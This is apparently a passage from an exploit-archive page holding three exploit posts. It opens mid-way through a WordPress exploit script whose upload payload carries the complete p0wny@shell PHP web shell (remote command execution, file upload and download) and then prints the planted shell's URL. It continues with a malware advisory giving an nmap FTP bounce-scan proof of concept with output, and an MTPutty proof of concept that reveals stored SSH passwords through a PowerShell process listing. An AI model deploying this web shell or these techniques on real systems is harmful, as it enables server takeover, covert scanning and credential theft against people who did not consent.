filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-<br />session.post(exploit_url, headers=header, data=shell_payload)<br />print('[*] Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/' + str(datetime.now().strftime('%Y')) + '/' + str(datetime.now().strftime('%m')) + '/shell.php')<br />print('')<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/29bc048d58ab8038c7001ef0d5e69c9b_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Prexot.a<br />Vulnerability: Port Bounce Scan (MITM)<br />Description: The malware listens on random high TCP ports e.g 11404, 19545, 17001, 10110 and accepts any credentials. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.<br />Type: PE32<br />MD5: 29bc048d58ab8038c7001ef0d5e69c9b<br />Vuln ID: MVID-2022-0485<br />Dropped files: services.exe, mstempf.exe<br />Disclosure: 02/08/2022<br /><br /><br />Exploit/PoC:<br />nmap -n -Pn -b malvuln:malvuln@192.168.18.129:19545 -p21,22,80 192.168.18.237 -v<br />Starting Nmap 7.80 ( https://nmap.org ) at 2022-02-07 15:45 UTC-11<br />Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).<br />Attempting connection to ftp://malvuln:malvuln@192.168.18.129:19545<br />Connected:220 Bot Server (Win32)<br />Login credentials accepted by FTP server!<br />Initiating Bounce Scan at 15:46<br />Attempting connection to ftp://malvuln:malvuln@192.168.18.129:19545<br />Connected:220 Bot Server (Win32)<br />Login credentials accepted by FTP server!<br />Discovered open port 80/tcp on 192.168.18.237<br />Completed Bounce Scan at 15:46, 10.39s elapsed (3 total ports)<br />Nmap scan report for 192.168.18.237<br />Host is up.<br /><br />PORT STATE SERVICE<br />21/tcp closed ftp<br />22/tcp closed ssh<br />80/tcp open http<br /><br />Read data files from: C:\Program Files (x86)\Nmap<br />Nmap done: 1 IP address (1 host up) scanned in 19.63 seconds<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: MTPutty 1.0.1.21 - SSH Password Disclosure<br /># Exploit Author: Sedat Ozdemir<br /># Version: 1.0.1.21<br /># Date: 06/12/2021<br /># Vendor Homepage: https://ttyplus.com/multi-tabbed-putty/<br /># Tested on: Windows 10<br /><br />Proof of Concept<br />================<br /><br />Step 1: Open MTPutty and add a new SSH connection.<br />Step 2: Click double times and connect to the server.<br />Step 3: Run run “Get-WmiObject Win32_Process | select name, commandline |<br />findstr putty.exe” on powershell.<br />Step 4: You can see the hidden password on PowerShell terminal.<br /><br /></code></pre>